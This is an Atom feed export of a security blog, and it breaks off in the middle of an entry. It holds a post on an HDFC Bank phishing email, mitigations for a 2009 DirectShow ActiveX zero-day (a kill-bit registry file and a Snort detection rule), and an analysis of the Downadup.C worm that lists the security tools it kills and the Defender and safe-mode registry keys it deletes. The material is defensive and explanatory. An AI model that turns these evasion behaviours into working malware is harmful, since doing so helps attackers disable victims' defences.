<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6152390082325118904</id><updated>2011-11-27T16:30:15.198-08:00</updated><category term='ms 08-067 exploit'/><category term='botnets for cell phones'/><category term='HDFC BANK SPAM MAIL'/><category term='W32.Downadup.B'/><category term='DNS'/><category term='ExpressAntiVirus2009'/><category term='MS Sql Zero day'/><category term='Downadup.B'/><category term='MS 08067 virus'/><category term='Removal tool for w32.downadup.b'/><category term='MSSQL Exploit'/><category term='Botnet DNS'/><category term='DENY EXECUTE ON sp_replwritetovarbin TO PUBLIC'/><category term='WORM_DOWNAD.A'/><category term='msVidCtl zero day'/><category term='sp_replwritetovarbin Exploit'/><category term='Rootkits'/><category term='W32.Downadup.C removal'/><category term='&apos;sp_replwritetovarbin&apos; Bufferoverflow'/><category term='Trojan.Brisv.A URLANDEXIT'/><category term='castleCops Offline'/><category term='scanner for ms 08-067'/><category term='new worm'/><category term='Zero Day Ms SQL'/><category term='RPC Exploit'/><category term='Ms Sql Exploit'/><category term='MS08-078 var shellcode'/><category term='CastleCops Down'/><category term='Cellphone Botnets'/><category term='email ecard virus'/><category term='W32.Downadup.B microsoft removal tools'/><category term='security updates for w32.downadup.b'/><category term='sp_replwritetovarbin exploit code'/><category term='ms sql exploits and vulnerabilities'/><category term='HDFC Bank'/><category term='W32.Downadup.B + removal tools'/><category term='ms09-002'/><category term='W32/Conficker'/><category term='CastleCops'/><category term='IE 7 Bug Fix'/><category term='Trojan.Brisv.A removal tool'/><category term='W32.Downadup'/><category term='W32.Downadup.C new variant'/><category term='w32.downadup Bot'/><category term='MSSQL'/><category term='Downadup'/><category term='SPAM'/><category term='w32.downadup.b removal tool'/><category term='MS-08078'/><category term='clsid: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'/><category term='Rouge Software'/><category term='Botnets and DNS'/><category term='0-day in Microsoft DirectShow'/><category term='W32/Confick-A'/><category term='MS SQL'/><category term='ecard virus'/><category term='Downadup.C. advisory'/><category term='sp_replwritetovarbin'/><category term='RPC Memory corruption'/><category term='removal tool virus W32.Downadup.B'/><category term='Net-Worm.Win32.Kido.l'/><category term='MS 08-067'/><category term='IE 7 Bug'/><category term='microsoft ms 08067'/><category term='w32.downadup and Botnet'/><category term='URLANDEXIT'/><category term='W32/Conficker mem svchost.exe'/><category term='CVE-2009-0075'/><category term='Microsoft zero day'/><category term='IE 7 Zero Day'/><category term='ASF File Infection'/><category term='Botnets'/><category term='Remote Memory Corruption Vulnerability'/><category term='ms09-002 exploit'/><category term='Exploitation of MS09-002'/><category term='IE 7 Exploit'/><category term='HTML_DLOADER.AS'/><category term='ms exploit 08067'/><category term='Botnet'/><category term='ms-08067 exploit'/><category term='MS-08067'/><category term='Trojan.Brisv.A'/><category term='SQL Server zero-day'/><category term='How is the trojan.Brisv.A spread'/><category term='W32.Downadup.C'/><title type='text'>Worms And Exploits</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>44</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-6961932054062842706</id><published>2011-10-16T11:32:00.000-07:00</published><updated>2011-10-16T11:32:49.079-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SPAM'/><category scheme='http://www.blogger.com/atom/ns#' term='HDFC BANK SPAM MAIL'/><category scheme='http://www.blogger.com/atom/ns#' term='HDFC Bank'/><title type='text'></title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Z6LV3UPl1yM/Tpsg_ZMqLvI/AAAAAAAANMI/l3Mja2yOHpI/s1600/mail.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="156" src="http://1.bp.blogspot.com/-Z6LV3UPl1yM/Tpsg_ZMqLvI/AAAAAAAANMI/l3Mja2yOHpI/s400/mail.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Figure 1.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Hi All, its long I blogged anything. Thought to start it again.Here is some spamming which i found, this was nicely done to collect Bank Records of HDFC Bank Customers, India.I got this mail couple of days back, here is the snapshot. Take a look at the attachment, (Figure 1. )"NetHDFC.html. Very poorly thought method, But still some people will click that.&lt;br /&gt;&lt;br /&gt;&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Ai1WRJLHI30/Tpshc7Wv_eI/AAAAAAAANMQ/SAjWyDPWnMg/s1600/attachment.png" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="219" src="http://1.bp.blogspot.com/-Ai1WRJLHI30/Tpshc7Wv_eI/AAAAAAAANMQ/SAjWyDPWnMg/s320/attachment.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Figure 2.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Here is next when you click on that attachment to open it. Look at the text, how beautifully written to Lure the customers to believe them. and click on the link to update their online account. (Figure 2.).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I tried to click it, see what i got in the next Figure 3. &lt;br /&gt;&lt;br /&gt;Asking for all usual stuff. My request to all HDFC Bank customers is that please do not respond to such mails, before you do, please look at the URL in the address bar. its not HDFC.&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: right;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-LcB3_J8-E20/TpsiGmcWgaI/AAAAAAAANMY/2qmQooU-GIw/s1600/Landing+page.png" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-LcB3_J8-E20/TpsiGmcWgaI/AAAAAAAANMY/2qmQooU-GIw/s320/Landing+page.png" width="264" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Figure 3&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-6961932054062842706?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/6961932054062842706/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=6961932054062842706' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6961932054062842706'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/6961932054062842706'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2011/10/figure-1.html' title=''/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-Z6LV3UPl1yM/Tpsg_ZMqLvI/AAAAAAAANMI/l3Mja2yOHpI/s72-c/mail.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-7286380039630505151</id><published>2009-07-07T07:43:00.001-07:00</published><updated>2009-07-07T07:57:51.444-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Microsoft zero day'/><category scheme='http://www.blogger.com/atom/ns#' term='clsid: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF'/><category scheme='http://www.blogger.com/atom/ns#' term='msVidCtl zero day'/><category scheme='http://www.blogger.com/atom/ns#' term='0-day in Microsoft DirectShow'/><title type='text'>Yet another 0-day for microsoft</title><content type='html'>Just a day back there was a new vulnerability released, and the bad guys are already using it a big time, many of the websites are compromised and delivering malwares by using drive-by-download method.&lt;br /&gt;I tried to look into it, and below is what i found some useful information on the issue.&lt;br /&gt;&lt;br /&gt;The first and foremost thing i found is you cannot simply get infected until unless you visit a infected site.&lt;br /&gt;Actually this vulnerability exists in the component provided support for digital TV applications and is installed on all versions of Windows XP by default. The vulnerability takes place when 'MPEG2TuneRequest'  is accessed which is an object of ActiveX and gets triggered if the object is initialized with malformed input through the 'data' parameter. This vulnerability is mostly exploited when a user visits a maliciously crafted web page. On successful exploit it results in an access with user level privileges by the attacker. Now if the attacker has enough system privileges then he could install programs; view, change, or delete data; or create new accounts with full user rights.&lt;br /&gt;&lt;br /&gt;There are few turn around given already by Microsoft.&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;1.  Set the kill-bit for the ClassID which is asscociated with this &lt;/b&gt;&lt;/u&gt;&lt;span style="" onmouseover="_tipon(this)" onmouseout="_tipoff()"&gt;&lt;u&gt;&lt;b&gt;Microsoft DirectShow (msvidctl.dll).&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;      I have given a .reg file below with is article you can use it to set the kill-bit. just copy paste and create a .reg file and use it.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{011B3619-FE63-4814-8A84-15A194CE9CE3}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0149EEDF-D08F-4142-8D73-D23903D21E90}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0369B4E5-45B6-11D3-B650-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0369B4E6-45B6-11D3-B650-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{055CB2D7-2969-45CD-914B-76890722F112}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{15D6504A-5494-499C-886C-973C9E53B9F1}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1BE49F30-0E1B-11D3-9D8E-00C04F72D980}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1C15D484-911D-11D2-B632-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1DF7D126-4050-47F0-A7CF-4C4CA9241333}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2C63E4EB-4CEA-41B8-919C-E947EA19A77C}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{334125C0-77E5-11D3-B653-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B0353C-A4C8-11D2-B634-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B03543-A4C8-11D2-B634-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B03544-A4C8-11D2-B634-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{418008F3-CF67-4668-9628-10DC52BE1D08}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4A5869CF-929D-4040-AE03-FCAFC5B9CD42}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{577FAA18-4518-445E-8F70-1473F8CF4BA4}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{59DC47A8-116C-11D3-9D8E-00C04F72D980}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F9CB14D-48E4-43B6-9346-1AEBC39C64D3}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{823535A0-0318-11D3-9D8E-00C04F72D980}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8872FF1B-98FA-4D7A-8D93-C9F1055F85BB}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8A674B4C-1F63-11D3-B64C-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8A674B4D-1F63-11D3-B64C-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9CD64701-BDF3-4D14-8E03-F12983D86664}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9E77AAC4-35E5-42A1-BDC2-8F3FF399847C}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A1A2B1C4-0E3A-11D3-9D8E-00C04F72D980}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A2E3074E-6C3D-11D3-B653-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A2E30750-6C3D-11D3-B653-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A8DCF3D5-0780-4EF4-8A83-2CFFAACB8ACE}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{AD8E510D-217F-409B-8076-29C5E73B98E8}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B0EDF163-910A-11D2-B632-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B64016F3-C9A2-4066-96F0-BD9563314726}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BB530C63-D9DF-4B49-9439-63453962E598}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C531D9FD-9685-4028-8B68-6E1232079F1E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCC-9B79-11D3-B654-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCD-9B79-11D3-B654-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCE-9B79-11D3-B654-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCF-9B79-11D3-B654-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CD0-9B79-11D3-B654-00C04F79498E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CAAFDD83-CEFC-4E3D-BA03-175F17A24F91}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D02AAC50-027E-11D3-9D8E-00C04F72D980}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F9769A06-7ACA-4E39-9CFB-97BB35F0E77E}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA7C375B-66A7-4280-879D-FD459C84BB02}]&lt;br /&gt;“Compatibility Flags”=dword:00000400&lt;br /&gt;&lt;u&gt;&lt;b&gt;&lt;br /&gt;2.  If you are using any snort based IDS you can use the follwoing snort rule to capture the attack and prevent it.&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;alert tcp $EXTERNAL_NET $HTTP_PORTS -&amp;gt; $HOME_NET any (msg:"msg:"ET CURRENT_EVENTS Microsoft Video ActiveX Control-Vulnerability Load";flow:to_client,established; content:"clsid"; nocase;content:&lt;span style="background-color: rgb(255, 255, 102);"&gt;"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"&lt;/span&gt;; nocase; classtype:web-application-attack; sid:2009xxx; rev:0;)&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: rgb(255, 255, 102);"&gt;XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX&lt;/span&gt;  ---&amp;gt; is the class IDs mentioned above. (replace this with above class IDs)&lt;br /&gt;&lt;br /&gt;=================================================================================================&lt;br /&gt; Few more are there in the below link.&lt;br /&gt;&lt;a href="http://doc.emergingthreats.net/bin/view/Main/2009493"&gt;http://doc.emergingthreats.net/bin/view/Main/2009493&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;References:&lt;br /&gt;&lt;a href="http://www.microsoft.com/technet/security/advisory/972890.mspx"&gt;http://www.microsoft.com/technet/security/advisory/972890.mspx&lt;/a&gt;&lt;br /&gt; &lt;a href="http://isc.sans.org/diary.html?storyid=6733"&gt;http://isc.sans.org/diary.html?storyid=6733&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-7286380039630505151?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/7286380039630505151/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=7286380039630505151' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/7286380039630505151'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/7286380039630505151'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/07/yet-another-0-day-for-microsoft.html' title='Yet another 0-day for microsoft'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6152390082325118904.post-8178099829651821640</id><published>2009-03-09T06:56:00.000-07:00</published><updated>2009-03-09T12:13:03.956-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.C'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.C removal'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup'/><category scheme='http://www.blogger.com/atom/ns#' term='Downadup.C. advisory'/><category scheme='http://www.blogger.com/atom/ns#' term='W32.Downadup.C new variant'/><title type='text'>New Variant: W32.Downadup.C</title><content type='html'>New Variant: W32.Downadup.C&lt;br&gt;&lt;br&gt;Guys the new variant is out, as expected.&lt;br&gt;This is the third version of Downadup called as "&lt;strong&gt;W32.Downadup.C&lt;/strong&gt;" this is the update component for machines currently infected with Downadup old variants. This new variant provides more powerful commands to the infected machines to disable antivirus software and other detection and analysis tools. The update also includes not to self-replicate and to behave more like a Trojan than a worm.&lt;br&gt; The new variant of Downadup is now generating 50, 000 domains rather than from a 250 domain generation in earlier versions, also uses one of a possible 116 domain suffixes.&lt;br&gt;&lt;br&gt;Any processes found on an infected machine from the list below are killed: &lt;br&gt;&lt;br&gt;•    wireshark&lt;br&gt;•    unlocker&lt;br&gt;•    tcpview&lt;br&gt;•    sysclean&lt;br&gt;•    scct_&lt;br&gt;•    regmon&lt;br&gt;•    procmon&lt;br&gt;•    procexp&lt;br&gt; •    ms08-06&lt;br&gt;•    mrtstub&lt;br&gt;•    mrt.&lt;br&gt;•    mbsa.&lt;br&gt;•    klwk&lt;br&gt;•    kido&lt;br&gt;•    kb958&lt;br&gt;•    kb890&lt;br&gt;•    hotfix&lt;br&gt;•    gmer&lt;br&gt;•    filemon&lt;br&gt;•    downad&lt;br&gt;•    confick&lt;br&gt;•    avenger&lt;br&gt;•    autoruns&lt;br&gt; &lt;br&gt; It lowers the security settings by deleting the following registry entry to prevent automatic startup of certain software:&lt;br&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\&amp;quot;Windows Defender&amp;quot;&lt;br&gt; &lt;br&gt;It disables Windows Security Alert notifications by deleting the following registry subkey:&lt;br&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}&lt;br&gt; &lt;br&gt;It also deletes the following registry entry to prevent the compromised computer from restarting in safe mode:&lt;br&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot&lt;br&gt;&lt;br&gt;The security risk then copies itself to one of the following locations:&lt;br&gt; &lt;ul&gt;&lt;li&gt;%ProgramFiles%\Internet Explorer\[RANDOM FILE NAME].dll&lt;/li&gt;&lt;li&gt;%ProgramFiles%\Movie Maker\[RANDOM FILE NAME].dll&lt;/li&gt;&lt;li&gt;%ProgramFiles%\Windows Media Player\[RANDOM FILE NAME].dll&lt;/li&gt;&lt;li&gt;%System%\Windows NT\[RANDOM FILE NAME].dll&lt;/li&gt; &lt;/ul&gt;I will update you more on this issue once i get from my findings.&lt;br&gt;&lt;br&gt;More in depth information and removal instructions can be found here&lt;br&gt;&lt;br&gt;&lt;a href="http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&amp;amp;tabid=2"&gt;http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&amp;amp;tabid=2&lt;/a&gt;&lt;br&gt; &lt;br&gt;Reference:&lt;br&gt;&lt;a href="https://forums2.symantec.com/t5/Malicious-Code/W32-Downadup-C-Digs-in-Deeper/ba-p/393245"&gt;https://forums2.symantec.com/t5/Malicious-Code/W32-Downadup-C-Digs-in-Deeper/ba-p/393245&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6152390082325118904-8178099829651821640?l=wormsandexploits.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://wormsandexploits.blogspot.com/feeds/8178099829651821640/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6152390082325118904&amp;postID=8178099829651821640' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8178099829651821640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6152390082325118904/posts/default/8178099829651821640'/><link rel='alternate' type='text/html' href='http://wormsandexploits.blogspot.com/2009/03/new-variant-w32downadupc.html' title='New Variant: W32.Downadup.C'/><author><name>Worms And Exploits</name><uri>http://www.blogger.com/profile/03280916344683658937</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 